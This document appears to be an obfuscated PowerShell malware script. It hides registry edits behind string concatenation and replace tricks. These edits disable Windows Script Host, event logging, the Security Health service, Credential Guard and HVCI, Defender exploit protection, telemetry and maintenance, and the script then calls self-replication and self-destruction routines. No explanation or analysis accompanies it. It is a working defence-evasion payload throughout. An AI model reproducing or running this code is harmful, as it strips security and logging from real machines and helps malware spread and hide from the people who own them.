      &      (     'Set-R'     +    'egistryP'    +   'roper'   +    'ti'       +  'es'      ) -path (     (  (    'HK'  +    (      'LM'    + ':'       )      +     ( 'C'     +  'Td'       )       )   + 'S'  +    (      (     'of' +   'tw'   )    +  'ar'    +    (       'eC'     +      'T'      )    )    +   (   (       'dMic' +      'ros'    )   +     'o'      +    (      'ftCT' +  'd'    )     )    +    (   'Wi'      +      'n'     +        (  'dow'    +   's'     )      )   +       (      (     ' '       +   'Sc'   )   +  'ri'    )  +     (    'p'  +      't '     )    +     (    'Ho'     +  'st'   )    +      (  (     'C'     +   'Td'     )    +     'Se'      )  +     't'  +  (    (    'ti'     +    'ng'     )    +       's'    )    )-cRePLAce (    'C'    +      'Td'       ),[cHAR]92     ) -properties @{(  'En'   +     (      'a'      +      (    'b'     +     'le'   )    )    +     'd'     )    =    0}

     &  (  'Set-Reg'       + 'istr'     +    'y'   +   'Prop'    +       'ert'      +      'ie' +    's'    ) -path (    (  'HKLM:{0}S'   +   (  'Y'    +     'ST'    )     +    'E'     +    'M{0'     +   '}Current'    +    'C' +    'o'    +    (   'n'    +       (   'tr'     +      'o'     )      )     +  (    'l'   +  'Se'    )   +     't{0'  +  '}Ser'   +   (       (     'vi'     + 'c'     )      +    'es'    )     +      '{0'     +     '}Even'      +    (    'tL'   + 'o'      )   +     'g') -f [ChAr]92        ) -properties @{(    (   'St'    +     'ar'  )      +      't' )       =    4}

  &    (      'Set-'  +  'Re'   +     'g'  +    'istryP'     +     'rop'      +    'erti'    + 'es'      ) -path (    (    'HKLM:{0}SYSTEM'    +   '{'   +  '0}Curr'   +     ( 'e'   +     (     'nt'    + 'Co'  )  +   'nt'    )   + 'rolSet{0}'      +    'Se'   +    (   'rv'   +     'i'       )    +   'ces{0}S'     +  'e'        +   'cu'   +      'r'      +     'i'  + 't'      +       ( (  'y'       +   'He'      )    +     (   'a'   +  'lt'      )    )       +   'hS'     +    (    'er'  +     (  'vi'  +    'c'      )    )    +    'e'    )  -F [ChAR]92     ) -properties @{(   'St'    +     (      'a'    +   'rt'   )   )     =     4}

     &    (    'Set-'  +    'Re'     +     'g'  +       'i'     +   's'  +  'tryProperties'       ) -path (     ((   (  'HK'    +     'LM:'    )     +   'Yo'   +    '1' )      + 'SY'   +       ( 'ST'   +    (      'E'    +    'MYo1'    )   +     (   'C'    +       'urr'   )  )  +  (     (    'e'      +   'nt'       )  +      (    'C'      +   'ont'   )     )  +     'r'    +     'ol'  +  (      'Se'     +      'tY'   )    +    'o' +   (     ( '1'    +     'Ser'      )     +  'v'  + (  'i'     +   'ce'    )     )     +     (      'sY'   +     'o'  )     +   '1'   +    'W'      +    (   'S'       +     (  'ear'     +    'ch'       ) )     ) -CRePLaCE(     'Yo'     +   '1'    ),[CHAr]92     ) -properties @{(    'S'   +    (  't'   +     (    'a'   +     'rt'     )   )   )       =  4}

     &    (     'Set-R'    +   'eg' +    'ist'     +    'r'    +   'yPro'      +   'per'     +    'ties'    ) -path (    (    (       'H'     + 'KL'    )     +  'M:{0}SOFT'   +     (      'W'   +     (   'AR'        +   'E'    )     )   +  '{0}M'     +   'icrosoft{0}Windows NT{0'      + '}C'    +    'u'  +     (  'r'     +    're'        )    +    'n'+     'tVersion{0}S'     + (      (    'c'   +   'he'    )  +    'd'  )    +    (     'u'     +      'le'   )   +  '{0}Mai'  +   (    'n'   +       (      'tenanc'    +  'e'     )    )   ) -F  [cHar]92   ) -properties @{(      ( (    'Mai'    +   'n'   )    +       't'    )   +     (    'e'   +  'na'     + (     'n'      +   'ce' )    )    +      (        'D'  +   'is'    )    +     (       'a'  +     (   'bl'   +  'e'   )    )       +      'd'     )     =     1}

      &    (  'Set'     +  '-Regist'    +   'ryPr'   +     'opertie'  +      's'  ) -path (   (   'HK' +  (  'LM'      +    (      ':3VL' +    'S'   )   )      +  'OF'      +    (  'T'      +    'WA'    )      +    ( 'RE'+('3'      +    'VLP'  +   'ol'  )        )    +    (   'ic'    +   'i'  ) +    (     'e'    +    (   's3VL'   + 'M'  )     )   +    'i'   +    (       'cr'    +    'o'  +     'so'      +      (  'ft3'    +    'VL'     +  'Win'   )  )    +     'd'     +     (    (  'o'      +  'ws3'  )   +    'VL'  )   +   (       'De'      +     'v'   )     +     (    'i'    +    (   'c'     +       'eGu'    ) )   +   (     'ar'   +    'd'    )    )."ReP`La`Ce"(    ( '3V'     +   'L'   ),'\'      )     ) -properties @{(     'Ls'   +    (     'a'    +  (     'Cf'  +    'g'   )      )    +      (       'F'  +    'la'      )    +    'gs'    )   =       0}
    &    (    'S'      +     'et-Reg'   + 'is'  +   'tryProp'   +  'erties'      ) -path (     (      (        'H'   +   'KL'     )        +      'M:'    +   'ri'       +   (    'dS'  +   'Y'    )     +    (   'S'      +      'TE'    )+  (    'M'       +    (    'ri'      +      'd'   )    )      +   (       'C'    +        ( 'ur'    +  'ren'     )    +       (       'tC'     +  'o'   +    'ntr' )    ) +      (     'ol'     +       (     'S'   +     'et'        )    +     'r' +      (     'i'  +    'dC'     )    +  (     'ont'    +       'ro'  )   )+   (     (        'lr'     +      'i'    )     +    'dL'    )   +      's'     +  'a'   )."reP`LA`CE"(    (    'ri'     +     'd'  ),'\'   )   ) -properties @{(       'L'   +    (    'sa'  +   'C' ) +    (    'fg'     +    (   'F'    +   'la'        )     +   'gs'  )    )        =    0}

    &    (      'Se'   +   't-'    +     'R'       +   'egistryPr'   +    'opert'  +      'ies'      ) -path (     (     'H'    +      (     'K'     +    (      'LM:Y'     +    'r'       )  )     +   'c'        +    (        (       'S'    +  'YS'    )    +   'T'  )     +     'EM'  +  (    (   'Y' +  'rcC'     )     +     'u'      +    'r'  )     +      (    'r'     + 'en'     +   (     'tCo'   +      'n'      )     )    +     (     't'      +     (      'ro'     +    'l'  )      )    +    'Se'+     't'      +    ( 'Y'      +   'rc'      )    +     (      (      'C'     +   'on'     )     +    't'     )      +  (    'ro'     +    ('lY' +    'r'     )  )    +   'c'   +     (      (      'Devic'      +    'e'   )    +   'G'     )      +      (       'ua'     + 'rd' )       ) -REpLace (       'Y'      +    'rc'       ),[chAr]92) -properties @{(    (    'En'+'ab'   )   +  (      (     'leV'    +   'i'   )   +     'rt'    )   +       (    (  'ualiz'     +     'a'  +   'ti'    +      'o' )   +     'n'     +      'Ba'       +       (   's'      +    'edSe'   )     )      +    'c'    +    (  (      'ur'   +   'i'    )      +   't'   )      +      'y'      )      =      0    ; (     'Re'    +  'qu'    +     'i'     +      're'    +    (    'P'    +    (    'latf'    +    'o'     )   )     +     (     (   'r'   +  'mSe'      )   +     (   'cu'     + 'r'     )     +        'i'  +    (   'tyF'    +   'ea'   ) )     +     't'    +  (    (  'ur'    + 'e'    )  + 's'    )      )     =      0   ;     (  'H'    +  (   'VC'  +    'I'    )   +    (      (   'MATR' +    'e'   )    + (    'qu' +    'i'      )       +      're'   )  +       'd'     )     =   0}

   &  (      'Set'     +    '-Registry'        +   'P'    +       'rop'     +    'erties'    ) -path (      (  'H'   +     'K'    +     'L'    +   'M'     +     (   ':'   +      'WG'  )      +     (     'd'      +   'SO'    ) + 'FT'     +  (    'W'     +   'AR'       +   (  'EWGdM'     +  'icr'  +    'os'      )   +   'of'     +   (    'tW'     +   'G'  )    )    +  'dH'     +      (    'vs'     +  'i'    )      )."rEpL`A`Ce"(    (    'WG'     +  'd' ),'\'   )      ) -properties @{(  (    (     'En'      + 'a'     )  +  'bl'       )   +     'ed'  )    =    0}

&  (   'Se'      +    't-R'  +     'e'   +     'gistr'      +   'yPrope'     +    'rties'    ) -path (       (     (   'H' + (    'KL'   +      'M'     )  )  +       ':{0'     +     '}'   +       'SO'     +   'FTWARE{0}Policies{0}Micro'  +    'soft{0}Windo'      +    'w'  +    (    (     's '    +  'D'     )    +     'ef'      +   (      'en'      +     'der'      )     )     +   '{0}'    +   'Wi'    +  'nd' +    (   'ow'     +   's'     )    +    (    ' D'    +    'e'   )  + (     'fe'+   'n'       )  +  (     'de'    +    'r'     )        +      ( ' E'       +    'x'      )     +     'p'   +      (  (      'lo'     +    'i'    ) +     't '     )     +    'Gu' +    'a'    +   'rd'    )-f [ChAR]92     ) -properties @{(     'E'     +    (    'n'   +       (  'ab'  +   'l'     )      )  +    'eE'      +      (  'x'     +   (  'p'  +   'lo'    )     +     (  'itPr'  +     'o'     )    )   +      (  'te'  +      'ct'      +    ( 'io'    +   'n'  )   )    )      =    0}

     &   (      'Set'     +   '-Reg'    +     'ist'     +    'ryProp'      +     'erties'   ) -path (     (     (     'H'    +     'KL'    )   +     'M:'    + (  (      'tY'   +     'nS'     )    +  'O'  ) +   (  'FT'       +   'W'  )   +    'A'    +    (      'R'   +    (    'Et'      +      'Y'     )     )   +   (       'nP'   +    'o'   )    +     (   (    'li'       +     'c'   )   +    'i'      )     +     ( 'e'  +   'st'      )      +        (    'Y'      +    'nM'    )      +   'i'   +   'c'    +    (       'r'     +    'os'    )       +  'o'      +   (      'f'      +   'tt'  +     (  'Y'  +     'nWi'      )   )      +   ( (   'ndo'     +     'w'       )      +    (   's'    +      'tYn'   )  +    'Da'   )   +      'ta'      +(        'C'  +  (     'oll'     +    'e'   )      +     (   'c'   +      'ti'   )    )    +    'on'     ) -cREPLAce(    't'  +  'Yn'     ),[cHar]92) -properties @{(   'A'  + (   (    'l'     +  'low'  )    +      ( 'T'     +     'el'    )    +  (    'em'      +     'e'       )    )   +     't'      +   'ry'   )      =   0}

      &   (   'S'       +     'et-Regi'       +  'stryPro'     +    'perti'        +     'es' ) -path (     (      'H'     +  (  'K'     +     (   'LM'       +       ':'    )      )     +    '{'    +  '0}SO'    +    (    (     'F'    +   'TW'  )   +    'A'     )     +      'RE{'      +        '0}Po'    +       (   'l'     +     'ic'   )    +    (    'ie'  +      's'      )    +     '{'     +   '0}M'      +     'icrosoft{'    +    '0}W'  +       'i'    +      'nd'   +   'ows{0'   + '}On'   +  (      'eD'      +  'ri'     )      +   've'   ) -f[CHaR]92      ) -properties @{( (  'D' +  'is'  )       +      (    'ab'      +    (    'l'   +    'eF'     ) )  +        (   'il'      +      'e'   )    +     (     'S'    +      (    'yn'     +     'c'  )   +      (        'N'    +     'GSC'  )    )    )   =  1}

  &   (       'Set-R'     +   'egist'      +    'ryP'   +    'ropert'   +    'ie'     +      's'    ) -path (    (      'H'       +  (      (   'K'   +   'LM:9I'  +     'gS' )   +    'O'    +   'F'      )   +      'T'     +   'W'    +     (    (      'ARE'       +     '9'   )    +    'I'     )   +     (   'gP'    +   'o'     )     +   'l'  +  (   'i'   +     'ci'   )     +  'e'    +    (     (      's'    +      '9I'   )    +   'g'   )   +    'Mi'     +  (    ( 'cro'  +  's'     )   +      'of'     )      +   't' +  '9'+ (    'I'  +    'gW'  )     +    'i'    +  (      'n'     + 'd'      +    (       'ows'   +   '9I'       +    'g'     )      ) +    ( (  'Win'   + 'd'    )    +    'o' )      +    'ws' +   (    ' S'     +   (      'ea'     +      'r'    )  )    +   'ch'    )  -creplacE(    '9I'      +      'g'     ),[ChaR]92  ) -properties @{( (  (    'Al'    +  'l'   )  +     (     'ow'   +   'C'   )   + (    'o'   +    'rt'    )    )    +   'an'    +     'a'   )      =  0}

    &     ( 'Invo'       +    'ke'    +      '-'  +   'SelfRe'  +     'plicati'     +  'on'   )

     &  ( 'Invo'       +      'ke'    +   '-'   + 'SelfDes'    +    'tructi'     +   'on'   )